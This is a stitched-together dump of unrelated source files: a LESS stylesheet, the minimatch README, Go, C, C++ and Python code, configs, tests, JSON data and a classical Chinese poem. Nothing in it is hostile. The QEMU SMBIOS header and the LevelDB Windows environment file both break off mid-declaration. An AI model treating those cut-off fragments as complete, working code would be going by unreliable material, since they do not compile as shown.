.row-split {
.col-content {
margin-top: 20px;
}
@media (min-width: @media-xs) {
display: flex;
flex-direction: row;
.col-side {
width: 360px;
}
.col-content {
flex-grow: 1;
margin-top: 0;
}
}
}
.palette-preview {
.rs-panel {
position: relative;
height: 578px;
}
}
.panel-color-wrap {
.panel-color {
th,
td {
text-align: left;
padding: 11px;
font-family: 'DejaVu Sans Mono', monospace;
}
}
}
.palette-logo-tool {
margin-top: 20px;
}
.palette-image-preview {
position: relative;
margin-top: 20px;
padding: 10px;
border-radius: 6px;
}
.palette-image-position-dot {
position: absolute;
background: #fff;
width: 8px;
height: 8px;
border-radius: 4px;
border: 1px solid #000;
}
.circle-picker-wrapper {
display: inline-block;
vertical-align: top;
}
.sketch-picker-wrapper {
margin-left: 20px;
display: inline-block;
position: relative;
.sketch-color-review {
padding: 5px;
background: rgb(255, 255, 255);
border-radius: 1px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 0px 1px;
display: inline-block;
cursor: pointer;
}
.sketch-color-value {
width: 68px;
height: 100px;
border-radius: 2px;
}
.sketch-picker-overlay {
position: absolute;
z-index: 2;
}
.sketch-picker-backdrop {
position: fixed;
top: 0px;
right: 0px;
bottom: 0px;
left: 0px;
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
# minimatch
A minimal matching utility.
[Build Status](http://travis-ci.org/isaacs/minimatch)
This is the matching library used internally by npm.
Eventually, it will replace the C binding in node-glob.
It works by converting glob expressions into JavaScript `RegExp`
objects.
## Usage
```javascript
var minimatch = require("minimatch")
minimatch("bar.foo", "*.foo") // true!
minimatch("bar.foo", "*.bar") // false!
minimatch("bar.foo", "*.+(bar|foo)", { debug: true }) // true, and noisy!
```
## Features
Supports these glob features:
* Brace Expansion
* Extended glob matching
* "Globstar" `**` matching
See:
* `man sh`
* `man bash`
* `man 3 fnmatch`
* `man 5 gitignore`
## Minimatch Class
Create a minimatch object by instantiating the `minimatch.Minimatch` class.
```javascript
var Minimatch = require("minimatch").Minimatch
var mm = new Minimatch(pattern, options)
```
### Properties
* `pattern` The original pattern the minimatch object represents.
* `options` The options supplied to the constructor.
* `set` A 2-dimensional array of regexp or string expressions.
Each row in the
array corresponds to a brace-expanded pattern. Each item in the row
corresponds to a single path-part. For example, the pattern
`{a,b/c}/d` would expand to a set of patterns like:
```
[ [ a, d ]
, [ b, c, d ] ]
```
If a portion of the pattern doesn't have any "magic" in it
(that is, it's something like `"foo"` rather than `fo*o?`), then it
will be left as a string rather than converted to a regular
expression.
* `regexp` Created by the `makeRe` method. A single regular expression
expressing the entire pattern. This is useful in cases where you wish
to use the pattern somewhat like `fnmatch(3)` with `FNM_PATHNAME` enabled.
* `negate` True if the pattern is negated.
* `comment` True if the pattern is a comment.
* `empty` True if the pattern is `""`.
### Methods
* `makeRe` Generate the `regexp` member if necessary, and return it.
Will return `false` if the pattern is invalid.
* `match(fname)` Return true if the filename matches the pattern, or
false otherwise.
* `matchOne(fileArray, patternArray, partial)` Take a `/`-split
filename, and match it against a single row in the `regExpSet`. This
method is mainly for internal use, but is exposed so that it can be
used by a glob-walker that needs to avoid excessive filesystem calls.
All other methods are internal, and will be called as necessary.
## Functions
The top-level exported function has a `cache` property, which is an LRU
cache that stores up to 100 items. So, calling these methods repeatedly
with the same pattern and options will use the same Minimatch object,
saving the cost of parsing it multiple times.
### minimatch(path, pattern, options)
Main export. Tests a path against the pattern using the options.
```javascript
var isJS = minimatch(file, "*.js", { matchBase: true })
```
### minimatch.filter(pattern, options)
Returns a function that tests its
supplied argument, suitable for use with `Array.filter`. Example:
```javascript
var javascripts = fileList.filter(minimatch.filter("*.js", {matchBase: true}))
```
### minimatch.match(list, pattern, options)
Match against the list of
files, in the style of fnmatch or glob. If nothing is matched, and
options.nonull is set, then return a list containing the pattern itself.
```javascript
var javascripts = minimatch.match(fileList, "*.js", {matchBase: true})
```
### minimatch.makeRe(pattern, options)
Make a regular expression object from the pattern.
## Options
All options are `false` by default.
### debug
Dump a ton of stuff to stderr.
### nobrace
Do not expand `{a,b}` and `{1..3}` brace sets.
### noglobstar
Disable `**` matching against multiple folder names.
### dot
Allow patterns to match filenames starting with a period, even if
the pattern does not explicitly have a period in that spot.
Note that by default, `a/**/b` will **not** match `a/.d/b`, unless `dot`
is set.
### noext
Disable "extglob" style patterns like `+(a|b)`.
### nocase
Perform a case-insensitive match.
### nonull
When a match is not found by `minimatch.match`, return a list containing
the pattern itself. When unset, an empty list is returned if there are
no matches.
### matchBase
If set, then patterns without slashes will be matched against the
basename of the path when the path contains slashes. For example,
`a?b` would match the path `/xyz/123/acb`, but not `/xyz/acb/123`.
### nocomment
Suppress the behavior of treating `#` at the start of a pattern as a
comment.
### nonegate
Suppress the behavior of treating a leading `!` character as negation.
### flipNegate
Returns matches from negated expressions as if they were not negated.
(That is, true on a hit, false on a miss.)
## Comparisons to other fnmatch/glob implementations
While strict compliance with the existing standards is a worthwhile
goal, some discrepancies exist between minimatch and other
implementations, and are intentional.
If the pattern starts with a `!` character, then it is negated. Set the
`nonegate` flag to suppress this behavior, and treat leading `!`
characters normally. This is perhaps relevant if you wish to start the
pattern with a negative extglob pattern like `!(a|B)`. Multiple `!`
characters at the start of a pattern will negate the pattern multiple
times.
If a pattern starts with `#`, then it is treated as a comment, and
will not match anything. Use `\#` to match a literal `#` at the
start of a line, or set the `nocomment` flag to suppress this behavior.
The double-star character `**` is supported by default, unless the
`noglobstar` flag is set. This is supported in the manner of bsdglob
and bash 4.1, where `**` only has special significance if it is the only
thing in a path part. That is, `a/**/b` will match `a/x/y/b`, but
`a/**b` will not.
If an escaped pattern has no matches, and the `nonull` flag is set,
then minimatch.match returns the pattern as-provided, rather than
interpreting the character escapes. For example,
`minimatch.match([], "\\*a\\?")` will return `"\\*a\\?"` rather than
`"*a?"`. This is akin to setting the `nullglob` option in bash, except
that it does not resolve escaped pattern characters.
If brace expansion is not disabled, then it is performed before any
other interpretation of the glob pattern. Thus, a pattern like
`+(a|{b),c)}`, which would not be valid in bash or zsh, is expanded
**first** into the set of `+(a|b)` and `+(a|c)`, and those patterns are
checked for validity. Since those two are valid, matching proceeds.
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package homedir
import (
"os"
"path/filepath"
"runtime"
)
// HomeDir returns the home directory for the current user.
// On Windows:
// 1. the first of %HOME%, %HOMEDRIVE%%HOMEPATH%, %USERPROFILE% containing a `.kube\config` file is returned.
// 2. if none of those locations contain a `.kube\config` file, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists and is writeable is returned.
// 3. if none of those locations are writeable, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists is returned.
// 4. if none of those locations exists, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that is set is returned.
func HomeDir() string {
if runtime.GOOS == "windows" {
home := os.Getenv("HOME")
homeDriveHomePath := ""
if homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH"); len(homeDrive) > 0 && len(homePath) > 0 {
homeDriveHomePath = homeDrive + homePath
}
userProfile := os.Getenv("USERPROFILE")
// Return first of %HOME%, %HOMEDRIVE%/%HOMEPATH%, %USERPROFILE% that contains a `.kube\config` file.
// %HOMEDRIVE%/%HOMEPATH% is preferred over %USERPROFILE% for backwards-compatibility.
for _, p := range []string{home, homeDriveHomePath, userProfile} {
if len(p) == 0 {
continue
}
if _, err := os.Stat(filepath.Join(p, ".kube", "config")); err != nil {
continue
}
return p
}
firstSetPath := ""
firstExistingPath := ""
// Prefer %USERPROFILE% over %HOMEDRIVE%/%HOMEPATH% for compatibility with other auth-writing tools
for _, p := range []string{home, userProfile, homeDriveHomePath} {
if len(p) == 0 {
continue
}
if len(firstSetPath) == 0 {
// remember the first path that is set
firstSetPath = p
}
info, err := os.Stat(p)
if err != nil {
continue
}
if len(firstExistingPath) == 0 {
// remember the first path that exists
firstExistingPath = p
}
if info.IsDir() && info.Mode().Perm()&(1<<(uint(7))) != 0 {
// return first path that is writeable
return p
}
}
// If none are writeable, return first location that exists
if len(firstExistingPath) > 0 {
return firstExistingPath
}
// If none exist, return first location that is set
if len(firstSetPath) > 0 {
return firstSetPath
}
// We've got nothing
return ""
}
return os.Getenv("HOME")
}
nelmio_cors:
defaults:
origin_regex: true
allow_origin: ['%env(CORS_ALLOW_ORIGIN)%']
allow_methods: ['GET', 'OPTIONS', 'POST', 'PUT', 'PATCH', 'DELETE']
allow_headers: ['Content-Type', 'Authorization', 'Preload', 'Fields']
expose_headers: ['Link']
max_age: 3600
paths:
'^/': null
import { run } from '@ember/runloop';
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import setupStyles from '../helpers/render-with-styles';
module('Integration | Changing local classes', function(hooks) {
setupRenderingTest(hooks);
test('changing a dynamic class value works', async function(assert) {
const hbs = setupStyles({
foo: '--foo',
bar: '--bar',
baz: '--baz'
});
this.set('extraClass', 'bar');
await render(hbs`<div data-test-element class="global" local-class="foo {{extraClass}}"></div>`);
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --bar');
run(() => this.set('extraClass', 'baz'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --baz');
run(() => this.set('extraClass', 'qux'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo');
});
});
form=词
tags=
放扁舟、万山环处,
平铺碧浪千顷。
仙人怜我征尘久,
借与梦游清枕。
风乍静。
望两岸群峰,
倒浸玻璃影。
楼台相映。
更日薄烟轻,
荷花似醉,
飞鸟堕寒镜。
中都内,
罗绮千街万井。
天教此地幽胜。
仇池仙伯今何在,
堤柳几眠还醒。
君试问。
□此意、只今更有何人领。
功名未竟。
待学取鸱夷,
仍携西子,
来动五湖兴。
{
"gender": "female",
"species": "ostrich",
"birthday": "7-31",
"games": {
"afe+": {
"personality": "snooty",
"clothes": "red-aloha-shirt",
"song": "K.K. Sonata"
},
"nl": {
"personality": "snooty",
"clothes": "purple-tie-dye-tee",
"song": "K.K. Sonata",
"phrase": "dahling",
"skill": "Computing",
"goal": "CEO",
"fear": "Mummy Mask",
"quote": "Cut once, measure twice... Wait- reverse that.",
"siblings": "Youngest triplet",
"favoriteStyle": "Basic",
"dislikedStyle": "Rock",
"favoriteColor": "Red",
"coffee": {
"beans": "Blue Mountain",
"milk": "Lots of milk",
"sugar": "3 spoonfuls of sugar"
}
},
"nh": {
"personality": "snooty",
"phrase": "dahling",
"song": "K.K. Sonata"
}
},
"name": "Julia",
"id": "julia"
}
fileFormatVersion: 2
guid: 91035448860ba4e708919485c73f7edc
timeCreated: 1442945121
licenseType: Pro
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
#ifndef QEMU_SMBIOS_H
#define QEMU_SMBIOS_H
/*
* SMBIOS Support
*
* Copyright (C) 2009 Hewlett-Packard Development Company, L.P.
*
* Authors:
* Alex Williamson <alex.williamson@hp.com>
*
* This work is licensed under the terms of the GNU GPL, version 2. See
* the COPYING file in the top-level directory.
*
*/
#include "qemu/option.h"
#define SMBIOS_MAX_TYPE 127
/* memory area description, used by type 19 table */
struct smbios_phys_mem_area {
uint64_t address;
uint64_t length;
};
/*
* SMBIOS spec defined tables
*/
typedef enum SmbiosEntryPointType {
SMBIOS_ENTRY_POINT_21,
SMBIOS_ENTRY_POINT_30,
} SmbiosEntryPointType;
/* SMBIOS Entry Point
* There are two types of entry points defined in the SMBIOS specification
* (see below). BIOS must place the entry point(s) at a 16-byte-aligned
* address between 0xf0000 and 0xfffff. Note that either entry point type
* can be used in a 64-bit target system, except that SMBIOS 2.1 entry point
* only allows the SMBIOS struct table to reside below 4GB address space.
*/
/* SMBIOS 2.1 (32-bit) Entry Point
* - introduced since SMBIOS 2.1
* - supports structure table below 4GB only
*/
struct smbios_21_entry_point {
uint8_t anchor_string[4];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint16_t max_structure_size;
uint8_t entry_point_revision;
uint8_t formatted_area[5];
uint8_t intermediate_anchor_string[5];
uint8_t intermediate_checksum;
uint16_t structure_table_length;
uint32_t structure_table_address;
uint16_t number_of_structures;
uint8_t smbios_bcd_revision;
} QEMU_PACKED;
/* SMBIOS 3.0 (64-bit) Entry Point
* - introduced since SMBIOS 3.0
* - supports structure table at 64-bit address space
*/
struct smbios_30_entry_point {
uint8_t anchor_string[5];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint8_t smbios_doc_rev;
uint8_t entry_point_revision;
uint8_t reserved;
uint32_t structure_table_max_size;
uint64_t structure_table_address;
} QEMU_PACKED;
typedef union {
struct smbios_21_entry_point ep21;
struct smbios_30_entry_point ep30;
} QEMU_PACKED SmbiosEntryPoint;
/* This goes at the beginning of every SMBIOS structure. */
struct smbios_structure_header {
uint8_t type;
uint8_t length;
uint16_t handle;
} QEMU_PACKED;
/* SMBIOS type 0 - BIOS Information */
struct smbios_type_0 {
struct smbios_structure_header header;
uint8_t vendor_str;
uint8_t bios_version_str;
uint16_t bios_starting_address_segment;
uint8_t bios_release_date_str;
uint8_t bios_rom_size;
uint64_t bios_characteristics;
uint8_t bios_characteristics_extension_bytes[2];
uint8_t system_bios_major_release;
uint8_t system_bios_minor_release;
uint8_t embedded_controller_major_release;
uint8_t embedded_controller_minor_release;
} QEMU_PACKED;
/* UUID encoding. The time_* fields are little-endian, as specified by SMBIOS
* version 2.6.
*/
struct smbios_uuid {
uint32_t time_low;
uint16_t time_mid;
uint16_t time_hi_and_version;
uint8_t clock_seq_hi_and_reserved;
uint8_t clock_seq_low;
uint8_t node[6];
} QEMU_PACKED;
/* SMBIOS type 1 - System Information */
struct smbios_type_1 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_name_str;
uint8_t version_str;
uint8_t serial_number_str;
struct smbios_uuid uuid;
uint8_t wake_up_type;
uint8_t sku_number_str;
uint8_t family_str;
} QEMU_PACKED;
/* SMBIOS type 2 - Base Board */
struct smbios_type_2 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_str;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t feature_flags;
uint8_t location_str;
uint16_t chassis_handle;
uint8_t board_type;
uint8_t contained_element_count;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 3 - System Enclosure (v2.7) */
struct smbios_type_3 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t type;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t boot_up_state;
uint8_t power_supply_state;
uint8_t thermal_state;
uint8_t security_status;
uint32_t oem_defined;
uint8_t height;
uint8_t number_of_power_cords;
uint8_t contained_element_count;
uint8_t sku_number_str;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 4 - Processor Information (v2.6) */
struct smbios_type_4 {
struct smbios_structure_header header;
uint8_t socket_designation_str;
uint8_t processor_type;
uint8_t processor_family;
uint8_t processor_manufacturer_str;
uint32_t processor_id[2];
uint8_t processor_version_str;
uint8_t voltage;
uint16_t external_clock;
uint16_t max_speed;
uint16_t current_speed;
uint8_t status;
uint8_t processor_upgrade;
uint16_t l1_cache_handle;
uint16_t l2_cache_handle;
uint16_t l3_cache_handle;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t core_count;
uint8_t core_enabled;
uint8_t thread_count;
uint16_t processor_characteristics;
uint16_t processor_family2;
} QEMU_PACKED;
/* SMBIOS type 16 - Physical Memory Array (v2.7) */
struct smbios_type_16 {
struct smbios_structure_header header;
uint8_t location;
uint8_t use
import astf_path
class ErrorLogger():
def __init__(self, name, allowed_errors):
self.iteration_counter = 0
self.name = name
self.client_allowed_errors = set(allowed_errors['client'])
self.server_allowed_errors = set(allowed_errors['server'])
self.iteration_to_mult_map = {}
self.iteration_to_error_map = {}
def increment_iteration_counter(self):
self.iteration_counter += 1
def log(self, errors):
self.iteration_to_error_map[self.iteration_counter] = errors
def log_multiplier(self, mult):
self.iteration_to_mult_map[self.iteration_counter] = mult
def should_stop(self):
return self.iteration_counter == 5
def invalid_errors(self, errors):
client_errors = set(errors.get('client', []))
server_errors = set(errors.get('server', []))
return not (client_errors.issubset(self.client_allowed_errors) and server_errors.issubset(self.server_allowed_errors))
class ErrorLoggingNDRPlugin():
def __init__(self, **kwargs):
allowed_errors = {'client': {u'tcps_conndrops': u'embryonic connections dropped'},
'server': {u'err_no_template': u"server can't match L7 template",
u'err_no_syn': u'server first flow packet with no SYN'}
}
self.logger = ErrorLogger(name="Plugin Demonstration for ASTF NDR", allowed_errors=allowed_errors)
def pre_iteration(self, run_results=None, **kwargs):
pass
def post_iteration(self, run_results, **kwargs):
if run_results['error_flag']:
self.logger.log(run_results['errors'])
self.logger.log_multiplier(run_results['mult'])
self.logger.increment_iteration_counter()
should_stop = self.logger.should_stop()
invalid_errors = self.logger.invalid_errors(run_results['errors'])
return should_stop, invalid_errors
# dynamic load of python module
def register():
return ErrorLoggingNDRPlugin()
// Copyright (c) 2018 The LevelDB Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file. See the AUTHORS file for names of contributors.
// Prevent Windows headers from defining min/max macros and instead
// use STL.
#ifndef NOMINMAX
#define NOMINMAX
#endif // ifndef NOMINMAX
#include <windows.h>
#include <algorithm>
#include <atomic>
#include <chrono>
#include <condition_variable>
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <memory>
#include <mutex>
#include <queue>
#include <sstream>
#include <string>
#include <vector>
#include "leveldb/env.h"
#include "leveldb/slice.h"
#include "port/port.h"
#include "port/thread_annotations.h"
#include "util/env_windows_test_helper.h"
#include "util/logging.h"
#include "util/mutexlock.h"
#include "util/windows_logger.h"
namespace leveldb {
namespace {
constexpr const size_t kWritableFileBufferSize = 65536;
// Up to 1000 mmaps for 64-bit binaries; none for 32-bit.
constexpr int kDefaultMmapLimit = (sizeof(void*) >= 8) ? 1000 : 0;
// Can be set by EnvWindowsTestHelper::SetReadOnlyMMapLimit().
int g_mmap_limit = kDefaultMmapLimit;
std::string GetWindowsErrorMessage(DWORD error_code) {
std::string message;
char* error_text = nullptr;
// Use MBCS version of FormatMessage to match return value.
size_t error_text_size = ::FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
nullptr, error_code, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
reinterpret_cast<char*>(&error_text), 0, nullptr);
if (!error_text) {
return message;
}
message.assign(error_text, error_text_size);
::LocalFree(error_text);
return message;
}
Status WindowsError(const std::string& context, DWORD error_code) {
if (error_code == ERROR_FILE_NOT_FOUND || error_code == ERROR_PATH_NOT_FOUND)
return Status::NotFound(context, GetWindowsErrorMessage(error_code));
return Status::IOError(context, GetWindowsErrorMessage(error_code));
}
class ScopedHandle {
public:
ScopedHandle(HANDLE handle) : handle_(handle) {}
ScopedHandle(const ScopedHandle&) = delete;
ScopedHandle(ScopedHandle&& other) noexcept : handle_(other.Release()) {}
~ScopedHandle() { Close(); }
ScopedHandle& operator=(const ScopedHandle&) = delete;
ScopedHandle& operator=(ScopedHandle&& rhs) noexcept {
if (this != &rhs) handle_ = rhs.Release();
return *this;
}
bool Close() {
if (!is_valid()) {
return true;
}
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return ::CloseHandle(h);
}
bool is_valid() const {
return handle_ != INVALID_HANDLE_VALUE && handle_ != nullptr;
}
HANDLE get() const { return handle_; }
HANDLE Release() {
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return h;
}
private:
HANDLE handle_;
};
// Helper class to limit resource usage to avoid exhaustion.
// Currently used to limit read-only file descriptors and mmap file usage
// so that we do not run out of file descriptors or virtual memory, or run into
// kernel performance problems for very large databases.
class Limiter {
public:
// Limit maximum number of resources to |max_acquires|.
Limiter(int max_acquires) : acquires_allowed_(max_acquires) {}
Limiter(const Limiter&) = delete;
Limiter operator=(const Limiter&) = delete;
// If another resource is available, acquire it and return true.
// Else return false.
bool Acquire() {
int old_acquires_allowed =
acquires_allowed_.fetch_sub(1, std::memory_order_relaxed);
if (old_acquires_allowed > 0) return true;
acquires_allowed_.fetch_add(1, std::memory_order_relaxed);
return false;
}
// Release a resource acquired by a previous call to Acquire() that returned
// true.
void Release() { acquires_allowed_.fetch_add(1, std::memory_order_relaxed); }
private:
// The number of available resources.
//
// This is a counter and is not tied to the invariants of any other class, so
// it can be operated on safely using std::memory_order_relaxed.
std::atomic<int> acquires_allowed_;
};
class WindowsSequentialFile : public SequentialFile {
public:
WindowsSequentialFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsSequentialFile() override {}
Status Read(size_t n, Slice* result, char* scratch) override {
DWORD bytes_read;
// DWORD is 32-bit, but size_t could technically be larger. However leveldb
// files are limited to leveldb::Options::max_file_size which is clamped to
// 1<<30 or 1 GiB.
assert(n <= std::numeric_limits<DWORD>::max());
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
nullptr)) {
return WindowsError(filename_, ::GetLastError());
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
Status Skip(uint64_t n) override {
LARGE_INTEGER distance;
distance.QuadPart = n;
if (!::SetFilePointerEx(handle_.get(), distance, nullptr, FILE_CURRENT)) {
return WindowsError(filename_, ::GetLastError());
}
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsRandomAccessFile : public RandomAccessFile {
public:
WindowsRandomAccessFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsRandomAccessFile() override = default;
Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
DWORD bytes_read = 0;
OVERLAPPED overlapped = {0};
overlapped.OffsetHigh = static_cast<DWORD>(offset >> 32);
overlapped.Offset = static_cast<DWORD>(offset);
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
&overlapped)) {
DWORD error_code = ::GetLastError();
if (error_code != ERROR_HANDLE_EOF) {
*result = Slice(scratch, 0);
return Status::IOError(filename_, GetWindowsErrorMessage(error_code));
}
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsMmapReadableFile : public RandomAccessFile {
public:
// base[0,length-1] contains the mmapped contents of the file.
WindowsMmapReadableFile(std::string filename, char* mmap_base, size_t length,
Limiter* mmap_limiter)
: mmap_base_(mmap_base),
length_(length),
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Oracle nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-->
<project name="TransparentRuler" basedir="." default="jar">
<import file="nbproject/jdk.xml"/>
<target name="-prop-init">
<property file="user.build.properties"/>
<property file="build.properties"/>
</target>
<target name="-init" depends="-prop-init,-jdk-init"/>
<target name="compile" depends="-init" description="Compile main sources.">
<mkdir dir="${classes.dir}"/>
<javac srcdir="${src.dir}" destdir="${classes.dir}" debug="${debug}" deprecation="${deprecation}">
<classpath path="${cp}"/>
</javac>
<copy todir="${classes.dir}">
<fileset dir="${src.dir}"/>
</copy>
</target>
<target name="jar" depends="compile" description="Build JAR file for main sources.">
<jar jarfile="${jar}" compress="true">
<manifest>
<attribute name="Main-Class" value="${main.class}"/>
</manifest>
<fileset dir="${classes.dir}"/>
</jar>
</target>
<target name="run" depends="compile" description="Run application.">
<fail unless="main.class">Must set property 'main.class' (e.g. in build.properties)</fail>
<java classname="${main.class}" fork="true" failonerror="true">
<classpath path="${run.cp}"/>
</java>
</target>
<target name="javadoc" depends="-init" description="Build Javadoc.">
<mkdir dir="${javadoc.dir}"/>
<javadoc destdir="${javadoc.dir}">
<classpath path="${cp}"/>
<sourcepath>
<pathelement location="${src.dir}"/>
</sourcepath>
<fileset dir="${src.dir}"/>
</javadoc>
</target>
<target name="clean" depends="-init" description="Clean build products.">
<delete dir="${build.dir}"/>
<delete file="${jar}"/>
</target>
<target name="profile">
<ant antfile="nbproject/netbeans-targets.xml" target="profile"/>
</target>
</project>
# computed by luarocks/buildroot
sha256 01211bb80dab92f87cece6e31854d73ae4a2ce06af7c48423a54313d72adf9fb wsapi-xavante-1.7-1.src.rock
sha256 6aa14e3febf7a9e810ce672b015f5a5514241ce5d1c3a6a48f921f089d270159 wsapi/doc/us/license.html
sha256 c7bf3061d00a96d10cb9dbc3a737d0af22594e2ef8f788842d7ab92eeaa864f2 wsapi/doc/us/license.md
# Dropbox JavaScript SDK Examples
To run the examples in your development environment:
1. Clone this repo
2. Run `npm install`
3. From the root of your repository, start the development server with
`npm start`.
4. Point your browser to <http://0.0.0.0:8080/>
## Code flow example
1. Clone this repo
2. Run `npm install`
3. Create an app in the [App console](https://www.dropbox.com/developers/apps).
4. Set a redirect URI "http://localhost:3000/auth" on the app's page on the [App
console](https://www.dropbox.com/developers/apps).
5. Set app key and secret in `examples/javascript/code_flow_example.js` on lines
17 and 18.
6. Run `node examples/javascript/code_flow_example.js`
7. Point your browser to <http://0.0.0.0:3000/>
#!/bin/sh
echo "Starting eosiodev service ..."
if [ "$(ls -A $DATA_DIR)" ]; then
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e --hard-replay
else
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e #--delete-all-blocks
fi
--TEST--
"set" tag block capture
--TEMPLATE--
{% set foo %}f<br />o<br />o{% endset %}
{{ foo }}
--DATA--
return []
--EXPECT--
f<br />o<br />o
import pytest
from utils.urls import assert_valid_url
from .map_301 import (
DEFAULT_SAMPLES_URLS,
FIREFOX_ACCOUNTS_URLS,
GITHUB_IO_URLS,
LEGACY_URLS,
MARIONETTE_URLS,
MOZILLADEMOS_URLS,
REDIRECT_URLS,
SCL3_REDIRECT_URLS,
WEBEXT_URLS,
ZONE_REDIRECT_URLS,
)
# while these test methods are similar, they're each testing a
# subset of redirects, and it was easier to work with them separately.
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", REDIRECT_URLS, ids=[item["url"] for item in REDIRECT_URLS]
)
def test_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", GITHUB_IO_URLS, ids=[item["url"] for item in GITHUB_IO_URLS]
)
def test_github_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MOZILLADEMOS_URLS, ids=[item["url"] for item in MOZILLADEMOS_URLS]
)
def test_mozillademos_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", DEFAULT_SAMPLES_URLS, ids=[item["url"] for item in DEFAULT_SAMPLES_URLS]
)
def test_default_samples_redirects(url, base_url, media_url):
url["base_url"] = base_url
url["location"] = f"{media_url}{url['url']}"
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", LEGACY_URLS, ids=[item["url"] for item in LEGACY_URLS])
def test_legacy_urls(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", SCL3_REDIRECT_URLS, ids=[item["url"] for item in SCL3_REDIRECT_URLS]
)
def test_scl3_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", ZONE_REDIRECT_URLS, ids=[item["url"] for item in ZONE_REDIRECT_URLS]
)
def test_zone_redirects(url, base_url):
url["base_url"] = base_url
